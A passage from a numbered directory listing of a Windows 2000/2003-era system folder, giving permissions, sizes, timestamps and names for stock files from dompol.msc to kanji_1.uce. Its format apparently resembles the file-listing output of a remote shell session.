  970. 100666/rw-rw-rw- 58368 fil 2002-12-31 07:00:00 -0500 dompol.msc
  971. 100666/rw-rw-rw- 4819 fil 2002-12-31 07:00:00 -0500 doshelp.hlp
  972. 100777/rwxrwxrwx 12560 fil 2002-12-31 07:00:00 -0500 doskey.exe
  973. 100777/rwxrwxrwx 53840 fil 2002-12-31 07:00:00 -0500 dosx.exe
  974. 100666/rw-rw-rw- 33040 fil 2002-12-31 07:00:00 -0500 dplay.dll
  975. 100777/rwxrwxrwx 29968 fil 2002-12-31 07:00:00 -0500 dplaysvr.exe
  976. 100666/rw-rw-rw- 218384 fil 2002-12-31 07:00:00 -0500 dplayx.dll
  977. 100666/rw-rw-rw- 22288 fil 2002-12-31 07:00:00 -0500 dpmodemx.dll
  978. 100666/rw-rw-rw- 53520 fil 2002-12-31 07:00:00 -0500 dpserial.dll
  979. 100666/rw-rw-rw- 42768 fil 2002-12-31 07:00:00 -0500 dpwsock.dll
  980. 100666/rw-rw-rw- 44304 fil 2002-12-31 07:00:00 -0500 dpwsockx.dll
  981. 40777/rwxrwxrwx 0 dir 2017-05-25 06:31:44 -0400 drivers
  982. 100666/rw-rw-rw- 148752 fil 2002-12-31 07:00:00 -0500 drmclien.dll
  983. 100666/rw-rw-rw- 77072 fil 2002-12-31 07:00:00 -0500 drmstor.dll
  984. 100777/rwxrwxrwx 28304 fil 2002-12-31 07:00:00 -0500 drwatson.exe
  985. 100777/rwxrwxrwx 72464 fil 2002-12-31 07:00:00 -0500 drwtsn32.exe
  986. 100666/rw-rw-rw- 4656 fil 2002-12-31 07:00:00 -0500 ds16gt.dLL
  987. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 ds32gt.dll
  988. 100666/rw-rw-rw- 24064 fil 2002-12-31 07:00:00 -0500 dsa.msc
  989. 100666/rw-rw-rw- 468240 fil 2002-12-31 07:00:00 -0500 dsadmin.dll
  990. 100666/rw-rw-rw- 74512 fil 2002-12-31 07:00:00 -0500 dsauth.dll
  991. 100666/rw-rw-rw- 18192 fil 2002-12-31 07:00:00 -0500 dsctl.dll
  992. 100666/rw-rw-rw- 41744 fil 2002-12-31 07:00:00 -0500 dsfolder.dll
  993. 100666/rw-rw-rw- 92944 fil 2002-12-31 07:00:00 -0500 dskquota.dll
  994. 100666/rw-rw-rw- 146192 fil 2002-12-31 07:00:00 -0500 dskquoui.dll
  995. 100666/rw-rw-rw- 298256 fil 2002-12-31 07:00:00 -0500 dsound.dll
  996. 100666/rw-rw-rw- 81 fil 2002-12-31 07:00:00 -0500 dsound.vxd
  997. 100666/rw-rw-rw- 1296144 fil 2002-12-31 07:00:00 -0500 dsound3d.dll
  998. 100666/rw-rw-rw- 299792 fil 2002-12-31 07:00:00 -0500 dsprop.dll
  999. 100666/rw-rw-rw- 157456 fil 2002-12-31 07:00:00 -0500 dsquery.dll
  1000. 100666/rw-rw-rw- 145680 fil 2002-12-31 07:00:00 -0500 dssbase.dll
  1001. 100666/rw-rw-rw- 217359 fil 2002-12-31 07:00:00 -0500 dssec.dat
  1002. 100666/rw-rw-rw- 28944 fil 2002-12-31 07:00:00 -0500 dssec.dll
  1003. 100666/rw-rw-rw- 147216 fil 2002-12-31 07:00:00 -0500 dssenh.dll
  1004. 100666/rw-rw-rw- 53760 fil 2002-12-31 07:00:00 -0500 dssite.msc
  1005. 100666/rw-rw-rw- 110864 fil 2002-12-31 07:00:00 -0500 dsuiext.dll
  1006. 100666/rw-rw-rw- 142096 fil 2002-12-31 07:00:00 -0500 dsuiwiz.dll
  1007. 100666/rw-rw-rw- 15632 fil 2003-06-19 22:44:58 -0400 dt_ctrl.dll
  1008. 100555/r-xr-xr-x 1785160 fil 2002-12-31 07:00:00 -0500 dtcsetup.exe
  1009. 100777/rwxrwxrwx 120592 fil 2002-12-31 07:00:00 -0500 dvdplay.exe
  1010. 100666/rw-rw-rw- 605456 fil 2002-12-31 07:00:00 -0500 dx7vb.dll
  1011. 100777/rwxrwxrwx 425232 fil 2002-12-31 07:00:00 -0500 dxdiag.exe
  1012. 100666/rw-rw-rw- 498205 fil 2002-12-31 07:00:00 -0500 dxmasf.dll
  1013. 100666/rw-rw-rw- 265488 fil 2002-12-31 07:00:00 -0500 dxmrtp.dll
  1014. 100666/rw-rw-rw- 325904 fil 2002-12-31 07:00:00 -0500 dxtmsft.dll
  1015. 100666/rw-rw-rw- 380688 fil 2002-12-31 07:00:00 -0500 dxtmsft3.dll
  1016. 100666/rw-rw-rw- 150288 fil 2002-12-31 07:00:00 -0500 dxtrans.dll
  1017. 100777/rwxrwxrwx 69886 fil 2002-12-31 07:00:00 -0500 edit.com
  1018. 100666/rw-rw-rw- 10790 fil 2002-12-31 07:00:00 -0500 edit.hlp
  1019. 100777/rwxrwxrwx 12642 fil 2002-12-31 07:00:00 -0500 edlin.exe
  1020. 100666/rw-rw-rw- 33552 fil 2002-12-31 07:00:00 -0500 efsadu.dll
  1021. 100666/rw-rw-rw- 127213 fil 2002-12-31 07:00:00 -0500 ega.cpi
  1022. 100666/rw-rw-rw- 157968 fil 2002-12-31 07:00:00 -0500 els.dll
  1023. 100666/rw-rw-rw- 15012 fil 2017-05-25 06:12:38 -0400 emptyregdb.dat
  1024. 100666/rw-rw-rw- 233232 fil 2002-12-31 07:00:00 -0500 es.dll
  1025. 100666/rw-rw-rw- 1135376 fil 2002-12-31 07:00:00 -0500 esent.dll
  1026. 100666/rw-rw-rw- 40720 fil 2002-12-31 07:00:00 -0500 esentprf.dll
  1027. 100666/rw-rw-rw- 3103 fil 2002-12-31 07:00:00 -0500 esentprf.hxx
  1028. 100666/rw-rw-rw- 511754 fil 2002-12-31 07:00:00 -0500 esentprf.ini
  1029. 100777/rwxrwxrwx 55568 fil 2002-12-31 07:00:00 -0500 esentutl.exe
  1030. 100777/rwxrwxrwx 187152 fil 2002-12-31 07:00:00 -0500 eudcedit.exe
  1031. 100666/rw-rw-rw- 27935 fil 2002-12-31 07:00:00 -0500 eula.txt
  1032. 100666/rw-rw-rw- 47888 fil 2002-12-31 07:00:00 -0500 eventlog.dll
  1033. 100777/rwxrwxrwx 9488 fil 2002-12-31 07:00:00 -0500 eventvwr.exe
  1034. 100666/rw-rw-rw- 99328 fil 2002-12-31 07:00:00 -0500 eventvwr.msc
  1035. 100777/rwxrwxrwx 8424 fil 2002-12-31 07:00:00 -0500 exe2bin.exe
  1036. 100777/rwxrwxrwx 15632 fil 2002-12-31 07:00:00 -0500 expand.exe
  1037. 40777/rwxrwxrwx 0 dir 2017-05-25 06:11:35 -0400 export
  1038. 100666/rw-rw-rw- 380957 fil 2002-12-31 07:00:00 -0500 expsrv.dll
  1039. 100666/rw-rw-rw- 14096 fil 2002-12-31 07:00:00 -0500 exstrace.dll
  1040. 100666/rw-rw-rw- 353 fil 2002-12-31 07:00:00 -0500 extenum.ldf
  1041. 100777/rwxrwxrwx 42256 fil 2002-12-31 07:00:00 -0500 extrac32.exe
  1042. 100777/rwxrwxrwx 882 fil 2002-12-31 07:00:00 -0500 fastopen.exe
  1043. 100666/rw-rw-rw- 31504 fil 2002-12-31 07:00:00 -0500 fax.cpk
  1044. 100666/rw-rw-rw- 92944 fil 2002-12-31 07:00:00 -0500 faxadmin.dll
  1045. 100666/rw-rw-rw- 80144 fil 2002-12-31 07:00:00 -0500 faxcom.dll
  1046. 100666/rw-rw-rw- 1361 fil 2002-12-31 07:00:00 -0500 faxcount.h
  1047. 100777/rwxrwxrwx 158992 fil 2002-12-31 07:00:00 -0500 faxcover.exe
  1048. 100666/rw-rw-rw- 15120 fil 2002-12-31 07:00:00 -0500 faxdrv.dll
  1049. 100666/rw-rw-rw- 19728 fil 2002-12-31 07:00:00 -0500 faxevent.dll
  1050. 100666/rw-rw-rw- 17168 fil 2002-12-31 07:00:00 -0500 faxext32.dll
  1051. 100666/rw-rw-rw- 14608 fil 2002-12-31 07:00:00 -0500 faxmapi.dll
  1052. 100666/rw-rw-rw- 77584 fil 2002-12-31 07:00:00 -0500 faxocm.dll
  1053. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 faxperf.dll
  1054. 100666/rw-rw-rw- 1505 fil 2002-12-31 07:00:00 -0500 faxperf.ini
  1055. 100777/rwxrwxrwx 47376 fil 2002-12-31 07:00:00 -0500 faxqueue.exe
  1056. 100666/rw-rw-rw- 17168 fil 2002-12-31 07:00:00 -0500 faxroute.dll
  1057. 100777/rwxrwxrwx 9488 fil 2002-12-31 07:00:00 -0500 faxsend.exe
  1058. 100666/rw-rw-rw- 50688 fil 2002-12-31 07:00:00 -0500 faxserv.msc
  1059. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 faxshell.dll
  1060. 100777/rwxrwxrwx 94992 fil 2002-12-31 07:00:00 -0500 faxsvc.exe
  1061. 100666/rw-rw-rw- 185616 fil 2002-12-31 07:00:00 -0500 faxt30.dll
  1062. 100666/rw-rw-rw- 59664 fil 2002-12-31 07:00:00 -0500 faxtiff.dll
  1063. 100666/rw-rw-rw- 138000 fil 2002-12-31 07:00:00 -0500 faxui.dll
  1064. 100666/rw-rw-rw- 27920 fil 2002-12-31 07:00:00 -0500 faxxp32.dll
  1065. 100777/rwxrwxrwx 16144 fil 2002-12-31 07:00:00 -0500 fc.exe
  1066. 100666/rw-rw-rw- 44816 fil 2003-06-19 22:45:00 -0400 fcachdll.dll
  1067. 100666/rw-rw-rw- 91408 fil 2002-12-31 07:00:00 -0500 fde.dll
  1068. 100666/rw-rw-rw- 50448 fil 2002-12-31 07:00:00 -0500 fdeploy.dll
  1069. 100666/rw-rw-rw- 16656 fil 2002-12-31 07:00:00 -0500 feclient.dll
  1070. 100666/rw-rw-rw- 294672 fil 2002-12-31 07:00:00 -0500 filemgmt.dll
  1071. 100777/rwxrwxrwx 10000 fil 2002-12-31 07:00:00 -0500 find.exe
  1072. 100777/rwxrwxrwx 25872 fil 2002-12-31 07:00:00 -0500 findstr.exe
  1073. 100777/rwxrwxrwx 10000 fil 2002-12-31 07:00:00 -0500 finger.exe
  1074. 100777/rwxrwxrwx 7440 fil 2002-12-31 07:00:00 -0500 fixmapi.exe
  1075. 100777/rwxrwxrwx 15120 fil 2002-12-31 07:00:00 -0500 flattemp.exe
  1076. 100666/rw-rw-rw- 17680 fil 2002-12-31 07:00:00 -0500 fmifs.dll
  1077. 100666/rw-rw-rw- 21692 fil 2017-05-25 06:14:34 -0400 folder.htt
  1078. 100666/rw-rw-rw- 200976 fil 2002-12-31 07:00:00 -0500 fontext.dll
  1079. 100666/rw-rw-rw- 78096 fil 2002-12-31 07:00:00 -0500 fontsub.dll
  1080. 100777/rwxrwxrwx 38672 fil 2002-12-31 07:00:00 -0500 fontview.exe
  1081. 100777/rwxrwxrwx 7440 fil 2002-12-31 07:00:00 -0500 forcedos.exe
  1082. 100777/rwxrwxrwx 34064 fil 2002-12-31 07:00:00 -0500 format.com
  1083. 100666/rw-rw-rw- 35152 fil 2002-12-31 07:00:00 -0500 fpnwclnt.dll
  1084. 100666/rw-rw-rw- 8752 fil 2002-12-31 07:00:00 -0500 framebuf.dll
  1085. 100777/rwxrwxrwx 34064 fil 2002-12-31 07:00:00 -0500 freecell.exe
  1086. 100666/rw-rw-rw- 38912 fil 2002-12-31 07:00:00 -0500 fsmgmt.msc
  1087. 100777/rwxrwxrwx 39696 fil 2002-12-31 07:00:00 -0500 ftp.exe
  1088. 100666/rw-rw-rw- 2549 fil 1999-05-19 18:00:52 -0400 ftpctrs.h
  1089. 100666/rw-rw-rw- 7854 fil 2002-12-31 07:00:00 -0500 ftpctrs.ini
  1090. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 ftpctrs2.dll
  1091. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 ftpsapi2.dll
  1092. 100666/rw-rw-rw- 186640 fil 2002-12-31 07:00:00 -0500 ftsrch.dll
  1093. 100666/rw-rw-rw- 43280 fil 2002-12-31 07:00:00 -0500 g711codc.ax
  1094. 100666/rw-rw-rw- 134928 fil 2002-12-31 07:00:00 -0500 g723codc.ax
  1095. 100666/rw-rw-rw- 24006 fil 2002-12-31 07:00:00 -0500 gb2312.uce
  1096. 100666/rw-rw-rw- 59664 fil 2002-12-31 07:00:00 -0500 gcdef.dll
  1097. 100777/rwxrwxrwx 24576 fil 2002-12-31 07:00:00 -0500 gdi.exe
  1098. 100666/rw-rw-rw- 233744 fil 2002-12-31 07:00:00 -0500 gdi32.dll
  1099. 100666/rw-rw-rw- 1591 fil 2002-12-31 07:00:00 -0500 getstart.gif
  1100. 100666/rw-rw-rw- 406800 fil 2002-12-31 07:00:00 -0500 getuname.dll
  1101. 100666/rw-rw-rw- 297744 fil 2002-12-31 07:00:00 -0500 glmf32.dll
  1102. 100666/rw-rw-rw- 119568 fil 2002-12-31 07:00:00 -0500 glu32.dll
  1103. 100666/rw-rw-rw- 305424 fil 2002-12-31 07:00:00 -0500 gpedit.dll
  1104. 100666/rw-rw-rw- 53248 fil 2002-12-31 07:00:00 -0500 gpedit.msc
  1105. 100666/rw-rw-rw- 93456 fil 2002-12-31 07:00:00 -0500 gpkcsp.dll
  1106. 100666/rw-rw-rw- 8192 fil 2002-12-31 07:00:00 -0500 gpkrsrc.dll
  1107. 100666/rw-rw-rw- 118544 fil 2002-12-31 07:00:00 -0500 gptext.dll
  1108. 100777/rwxrwxrwx 34576 fil 2002-12-31 07:00:00 -0500 graftabl.com
  1109. 100777/rwxrwxrwx 19694 fil 2002-12-31 07:00:00 -0500 graphics.com
  1110. 100666/rw-rw-rw- 21232 fil 2002-12-31 07:00:00 -0500 graphics.pro
  1111. 100777/rwxrwxrwx 41232 fil 2002-12-31 07:00:00 -0500 grpconv.exe
  1112. 100666/rw-rw-rw- 277264 fil 2002-12-31 07:00:00 -0500 h261_32.ax
  1113. 100666/rw-rw-rw- 307472 fil 2002-12-31 07:00:00 -0500 h263_32.ax
  1114. 100666/rw-rw-rw- 254736 fil 2002-12-31 07:00:00 -0500 h323.tsp
  1115. 100666/rw-rw-rw- 163088 fil 2002-12-31 07:00:00 -0500 h323msp.dll
  1116. 100666/rw-rw-rw- 82176 fil 2002-12-31 07:00:00 -0500 hal.dll
  1117. 100666/rw-rw-rw- 15442 fil 2002-12-31 07:00:00 -0500 hardware.inf
  1118. 100666/rw-rw-rw- 128272 fil 2002-12-31 07:00:00 -0500 hdwwiz.cpl
  1119. 100777/rwxrwxrwx 11536 fil 2002-12-31 07:00:00 -0500 help.exe
  1120. 100666/rw-rw-rw- 516200 fil 2002-12-31 07:00:00 -0500 hhctrl.ocx
  1121. 100666/rw-rw-rw- 37888 fil 2002-12-31 07:00:00 -0500 hhsetup.dll
  1122. 100666/rw-rw-rw- 18192 fil 2002-12-31 07:00:00 -0500 hid.dll
  1123. 100666/rw-rw-rw- 4768 fil 2002-12-31 07:00:00 -0500 himem.sys
  1124. 100666/rw-rw-rw- 81978 fil 2002-12-31 07:00:00 -0500 hlink.dll
  1125. 100666/rw-rw-rw- 104 fil 2002-12-31 07:00:00 -0500 homepage.inf
  1126. 100777/rwxrwxrwx 8464 fil 2002-12-31 07:00:00 -0500 hostname.exe
  1127. 100666/rw-rw-rw- 76560 fil 2002-12-31 07:00:00 -0500 hotplug.dll
  1128. 100666/rw-rw-rw- 30480 fil 2002-12-31 07:00:00 -0500 hours.ocx
  1129. 100666/rw-rw-rw- 56080 fil 2002-12-31 07:00:00 -0500 hpmon.dll
  1130. 100666/rw-rw-rw- 45631 fil 2002-12-31 07:00:00 -0500 hpmon.hlp
  1131. 100666/rw-rw-rw- 21776 fil 2002-12-31 07:00:00 -0500 hticons.dll
  1132. 100666/rw-rw-rw- 40720 fil 2002-12-31 07:00:00 -0500 htui.dll
  1133. 100666/rw-rw-rw- 574224 fil 2002-12-31 07:00:00 -0500 hypertrm.dll
  1134. 100666/rw-rw-rw- 199680 fil 2002-12-31 07:00:00 -0500 iac25_32.ax
  1135. 40777/rwxrwxrwx 0 dir 2018-11-21 02:42:04 -0500 ias
  1136. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 ias.dll
  1137. 100666/rw-rw-rw- 50688 fil 2002-12-31 07:00:00 -0500 ias.msc
  1138. 100666/rw-rw-rw- 28944 fil 2002-12-31 07:00:00 -0500 iasacct.dll
  1139. 100666/rw-rw-rw- 75536 fil 2002-12-31 07:00:00 -0500 iasads.dll
  1140. 100666/rw-rw-rw- 34064 fil 2002-12-31 07:00:00 -0500 iashlpr.dll
  1141. 100666/rw-rw-rw- 250128 fil 2002-12-31 07:00:00 -0500 iasmmc.dll
  1142. 100666/rw-rw-rw- 60176 fil 2002-12-31 07:00:00 -0500 iasnap.dll
  1143. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 iasperf.dll
  1144. 100666/rw-rw-rw- 2614 fil 2002-12-31 07:00:00 -0500 iasperf.h
  1145. 100666/rw-rw-rw- 7265 fil 2002-12-31 07:00:00 -0500 iasperf.ini
  1146. 100666/rw-rw-rw- 42768 fil 2002-12-31 07:00:00 -0500 iaspipe.dll
  1147. 100666/rw-rw-rw- 25872 fil 2002-12-31 07:00:00 -0500 iaspolcy.dll
  1148. 100666/rw-rw-rw- 97040 fil 2002-12-31 07:00:00 -0500 iasrad.dll
  1149. 100666/rw-rw-rw- 25360 fil 2002-12-31 07:00:00 -0500 iasrecst.dll
  1150. 100666/rw-rw-rw- 100624 fil 2002-12-31 07:00:00 -0500 iassam.dll
  1151. 100666/rw-rw-rw- 269584 fil 2002-12-31 07:00:00 -0500 iassdo.dll
  1152. 100666/rw-rw-rw- 60176 fil 2002-12-31 07:00:00 -0500 iassvcs.dll
  1153. 100666/rw-rw-rw- 20240 fil 2002-12-31 07:00:00 -0500 iasuserr.dll
  1154. 100666/rw-rw-rw- 125712 fil 2002-12-31 07:00:00 -0500 icaapi.dll
  1155. 100666/rw-rw-rw- 110592 fil 2002-12-31 07:00:00 -0500 iccvid.dll
  1156. 100666/rw-rw-rw- 5904 fil 2002-12-31 07:00:00 -0500 icfgnt5.dll
  1157. 100666/rw-rw-rw- 245008 fil 2002-12-31 07:00:00 -0500 icm32.dll
  1158. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 icmp.dll
  1159. 100666/rw-rw-rw- 51472 fil 2002-12-31 07:00:00 -0500 icmui.dll
  1160. 100666/rw-rw-rw- 57104 fil 2002-12-31 07:00:00 -0500 icwdial.dll
  1161. 100666/rw-rw-rw- 49424 fil 2002-12-31 07:00:00 -0500 icwphbk.dll
  1162. 100666/rw-rw-rw- 60458 fil 2002-12-31 07:00:00 -0500 ideograf.uce
  1163. 100666/rw-rw-rw- 122128 fil 2002-12-31 07:00:00 -0500 idq.dll
  1164. 100777/rwxrwxrwx 27920 fil 2002-12-31 07:00:00 -0500 ie4uinit.exe
  1165. 40777/rwxrwxrwx 0 dir 2017-05-24 22:49:15 -0400 ie_de
  1166. 100666/rw-rw-rw- 126224 fil 2002-12-31 07:00:00 -0500 ieakeng.dll
  1167. 100666/rw-rw-rw- 110864 fil 2002-12-31 07:00:00 -0500 ieaksie.dll
  1168. 100666/rw-rw-rw- 215040 fil 2002-12-31 07:00:00 -0500 ieakui.dll
  1169. 100666/rw-rw-rw- 198928 fil 2002-12-31 07:00:00 -0500 iedkcs32.dll
  1170. 100666/rw-rw-rw- 100112 fil 2002-12-31 07:00:00 -0500 iepeers.dll
  1171. 100666/rw-rw-rw- 23824 fil 2002-12-31 07:00:00 -0500 iernonce.dll
  1172. 100666/rw-rw-rw- 58128 fil 2002-12-31 07:00:00 -0500 iesetup.dll
  1173. 100777/rwxrwxrwx 52496 fil 2002-12-31 07:00:00 -0500 ieshwiz.exe
  1174. 100666/rw-rw-rw- 15871 fil 2002-12-31 07:00:00 -0500 ieuinit.inf
  1175. 100777/rwxrwxrwx 118032 fil 2002-12-31 07:00:00 -0500 iexpress.exe
  1176. 100666/rw-rw-rw- 111376 fil 2002-12-31 07:00:00 -0500 ifmon.dll
  1177. 100666/rw-rw-rw- 67344 fil 2002-12-31 07:00:00 -0500 ifsutil.dll
  1178. 100666/rw-rw-rw- 8976 fil 2002-12-31 07:00:00 -0500 igmpagnt.dll
  1179. 100666/rw-rw-rw- 93456 fil 2002-12-31 07:00:00 -0500 igmpv2.dll
  1180. 100666/rw-rw-rw- 124176 fil 2002-12-31 07:00:00 -0500 iisRtl.dll
  1181. 100666/rw-rw-rw- 56592 fil 2002-12-31 07:00:00 -0500 iisext.dll
  1182. 100666/rw-rw-rw- 57616 fil 2002-12-31 07:00:00 -0500 iismap.dll
  1183. 100777/rwxrwxrwx 14608 fil 2002-12-31 07:00:00 -0500 iisreset.exe
  1184. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 iisrstap.dll
  1185. 100666/rw-rw-rw- 10000 fil 2002-12-31 07:00:00 -0500 iissuba.dll
  1186. 100666/rw-rw-rw- 63248 fil 2002-12-31 07:00:00 -0500 ils.dll
  1187. 100666/rw-rw-rw- 16656 fil 2002-12-31 07:00:00 -0500 imaadp32.acm
  1188. 100666/rw-rw-rw- 128784 fil 2002-12-31 07:00:00 -0500 imagehlp.dll
  1189. 100666/rw-rw-rw- 32768 fil 2002-12-31 07:00:00 -0500 imeshare.dll
  1190. 100666/rw-rw-rw- 102672 fil 2002-12-31 07:00:00 -0500 imgadmin.ocx
  1191. 100666/rw-rw-rw- 60688 fil 2002-12-31 07:00:00 -0500 imgcmn.dll
  1192. 100666/rw-rw-rw- 306448 fil 2002-12-31 07:00:00 -0500 imgedit.ocx
  1193. 100666/rw-rw-rw- 117520 fil 2002-12-31 07:00:00 -0500 imgscan.ocx
  1194. 100666/rw-rw-rw- 13584 fil 2002-12-31 07:00:00 -0500 imgshl.dll
  1195. 100666/rw-rw-rw- 107792 fil 2002-12-31 07:00:00 -0500 imgthumb.ocx
  1196. 100666/rw-rw-rw- 31504 fil 2002-12-31 07:00:00 -0500 imgutil.dll
  1197. 100666/rw-rw-rw- 96528 fil 2002-12-31 07:00:00 -0500 imm32.dll
  1198. 100666/rw-rw-rw- 11536 fil 2002-12-31 07:00:00 -0500 indicdll.dll
  1199. 100666/rw-rw-rw- 251152 fil 2002-12-31 07:00:00 -0500 inetcfg.dll
  1200. 100666/rw-rw-rw- 572688 fil 2002-12-31 07:00:00 -0500 inetcomm.dll
  1201. 100666/rw-rw-rw- 257296 fil 2002-12-31 07:00:00 -0500 inetcpl.cpl
  1202. 100666/rw-rw-rw- 62976 fil 2002-12-31 07:00:00 -0500 inetcplc.dll
  1203. 100666/rw-rw-rw- 29456 fil 2002-12-31 07:00:00 -0500 inetmib1.dll
  1204. 100666/rw-rw-rw- 66832 fil 2002-12-31 07:00:00 -0500 inetpp.dll
  1205. 100666/rw-rw-rw- 47616 fil 2002-12-31 07:00:00 -0500 inetres.dll
  1206. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 inetsloc.dll
  1207. 40777/rwxrwxrwx 0 dir 2018-11-25 19:32:10 -0500 inetsrv
  1208. 100666/rw-rw-rw- 13584 fil 2002-12-31 07:00:00 -0500 infoadmn.dll
  1209. 100666/rw-rw-rw- 9488 fil 2002-12-31 07:00:00 -0500 infoctrs.dll
  1210. 100666/rw-rw-rw- 3276 fil 1999-05-19 18:02:02 -0400 infoctrs.h
  1211. 100666/rw-rw-rw- 11355 fil 2002-12-31 07:00:00 -0500 infoctrs.ini
  1212. 100666/rw-rw-rw- 206096 fil 2002-12-31 07:00:00 -0500 infosoft.dll
  1213. 100666/rw-rw-rw- 138000 fil 2002-12-31 07:00:00 -0500 initpki.dll
  1214. 100666/rw-rw-rw- 74000 fil 2002-12-31 07:00:00 -0500 inseng.dll
  1215. 100666/rw-rw-rw- 618889 fil 2002-12-31 07:00:00 -0500 instcat.sql
  1216. 100666/rw-rw-rw- 6437 fil 2002-12-31 07:00:00 -0500 instcm.inf
  1217. 100777/rwxrwxrwx 20752 fil 2002-12-31 07:00:00 -0500 internat.exe
  1218. 100666/rw-rw-rw- 118032 fil 2002-12-31 07:00:00 -0500 intl.cpl
  1219. 100666/rw-rw-rw- 13824 fil 2002-12-31 07:00:00 -0500 iologmsg.dll
  1220. 100666/rw-rw-rw- 34576 fil 2002-12-31 07:00:00 -0500 ipbootp.dll
  1221. 100666/rw-rw-rw- 11024 fil 2002-12-31 07:00:00 -0500 ipconf.tsp
  1222. 100777/rwxrwxrwx 35600 fil 2002-12-31 07:00:00 -0500 ipconfig.exe
  1223. 100666/rw-rw-rw- 69904 fil 2002-12-31 07:00:00 -0500 iphlpapi.dll
  1224. 100666/rw-rw-rw- 157968 fil 2002-12-31 07:00:00 -0500 ipmontr.dll
  1225. 100666/rw-rw-rw- 441616 fil 2002-12-31 07:00:00 -0500 ipnathlp.dll
  1226. 100666/rw-rw-rw- 317712 fil 2002-12-31 07:00:00 -0500 ippromon.dll
  1227. 100666/rw-rw-rw- 71952 fil 2002-12-31 07:00:00 -0500 iprip2.dll
  1228. 100666/rw-rw-rw- 4368 fil 2002-12-31 07:00:00 -0500 iprop.dll
  1229. 100666/rw-rw-rw- 4880 fil 2002-12-31 07:00:00 -0500 iprtprio.dll
  1230. 100666/rw-rw-rw- 159504 fil 2002-12-31 07:00:00 -0500 iprtrmgr.dll
  1231. 100777/rwxrwxrwx 29456 fil 2002-12-31 07:00:00 -0500 ipsecmon.exe
  1232. 100666/rw-rw-rw- 628496 fil 2002-12-31 07:00:00 -0500 ipsecsnp.dll
  1233. 100666/rw-rw-rw- 829200 fil 2002-12-31 07:00:00 -0500 ipsnap.dll
  1234. 100666/rw-rw-rw- 87312 fil 2002-12-31 07:00:00 -0500 ipxmontr.dll
  1235. 100666/rw-rw-rw- 71952 fil 2002-12-31 07:00:00 -0500 ipxpromn.dll
  1236. 100666/rw-rw-rw- 22800 fil 2002-12-31 07:00:00 -0500 ipxrip.dll
  1237. 100777/rwxrwxrwx 22288 fil 2002-12-31 07:00:00 -0500 ipxroute.exe
  1238. 100666/rw-rw-rw- 41744 fil 2002-12-31 07:00:00 -0500 ipxrtmgr.dll
  1239. 100666/rw-rw-rw- 68880 fil 2002-12-31 07:00:00 -0500 ipxsap.dll
  1240. 100666/rw-rw-rw- 477456 fil 2002-12-31 07:00:00 -0500 ipxsnap.dll
  1241. 100666/rw-rw-rw- 21776 fil 2002-12-31 07:00:00 -0500 ipxwan.dll
  1242. 100666/rw-rw-rw- 199168 fil 2002-12-31 07:00:00 -0500 ir32_32.dll
  1243. 100666/rw-rw-rw- 848384 fil 2002-12-31 07:00:00 -0500 ir41_32.ax
  1244. 100666/rw-rw-rw- 120320 fil 2002-12-31 07:00:00 -0500 ir41_qc.dll
  1245. 100666/rw-rw-rw- 338432 fil 2002-12-31 07:00:00 -0500 ir41_qcx.dll
  1246. 100666/rw-rw-rw- 755200 fil 2002-12-31 07:00:00 -0500 ir50_32.dll
  1247. 100666/rw-rw-rw- 200192 fil 2002-12-31 07:00:00 -0500 ir50_qc.dll
  1248. 100666/rw-rw-rw- 183808 fil 2002-12-31 07:00:00 -0500 ir50_qcx.dll
  1249. 100666/rw-rw-rw- 13584 fil 2002-12-31 07:00:00 -0500 irclass.dll
  1250. 100777/rwxrwxrwx 83728 fil 2002-12-31 07:00:00 -0500 irftp.exe
  1251. 100666/rw-rw-rw- 73488 fil 2002-12-31 07:00:00 -0500 irmon.dll
  1252. 100666/rw-rw-rw- 36112 fil 2002-12-31 07:00:00 -0500 irprops.cpl
  1253. 100666/rw-rw-rw- 72464 fil 2002-12-31 07:00:00 -0500 isign32.dll
  1254. 100666/rw-rw-rw- 34576 fil 2002-12-31 07:00:00 -0500 ismip.dll
  1255. 100777/rwxrwxrwx 25872 fil 2002-12-31 07:00:00 -0500 ismserv.exe
  1256. 100666/rw-rw-rw- 17168 fil 2002-12-31 07:00:00 -0500 ismsink.dll
  1257. 100666/rw-rw-rw- 56080 fil 2002-12-31 07:00:00 -0500 ismsmtp.dll
  1258. 100666/rw-rw-rw- 143872 fil 2002-12-31 07:00:00 -0500 itircl.dll
  1259. 100666/rw-rw-rw- 122368 fil 2002-12-31 07:00:00 -0500 itss.dll
  1260. 100666/rw-rw-rw- 94720 fil 2002-12-31 07:00:00 -0500 iuctl.dll
  1261. 100666/rw-rw-rw- 176128 fil 2002-12-31 07:00:00 -0500 iuengine.dll
  1262. 100666/rw-rw-rw- 154624 fil 2002-12-31 07:00:00 -0500 ivfsrc.ax
  1263. 100666/rw-rw-rw- 49936 fil 2002-12-31 07:00:00 -0500 ixsso.dll
  1264. 100666/rw-rw-rw- 250640 fil 2002-12-31 07:00:00 -0500 jet.dll
  1265. 100666/rw-rw-rw- 374032 fil 2002-12-31 07:00:00 -0500 jet500.dll
  1266. 100777/rwxrwxrwx 47888 fil 2002-12-31 07:00:00 -0500 jetconv.exe
  1267. 100777/rwxrwxrwx 6416 fil 1999-12-01 01:40:04 -0500 jetpack.exe
  1268. 100666/rw-rw-rw- 47952 fil 2002-12-31 07:00:00 -0500 jobexec.dll
  1269. 100666/rw-rw-rw- 60688 fil 2002-12-31 07:00:00 -0500 joy.cpl
  1270. 100666/rw-rw-rw- 27920 fil 2002-12-31 07:00:00 -0500 jpeg1x32.dll
  1271. 100666/rw-rw-rw- 38160 fil 2002-12-31 07:00:00 -0500 jpeg2x32.dll
  1272. 100666/rw-rw-rw- 487481 fil 2002-12-31 07:00:00 -0500 jscript.dll
  1273. 100666/rw-rw-rw- 13072 fil 2002-12-31 07:00:00 -0500 jsproxy.dll
  1274. 100666/rw-rw-rw- 6948 fil 2002-12-31 07:00:00 -0500 kanji_1.uce
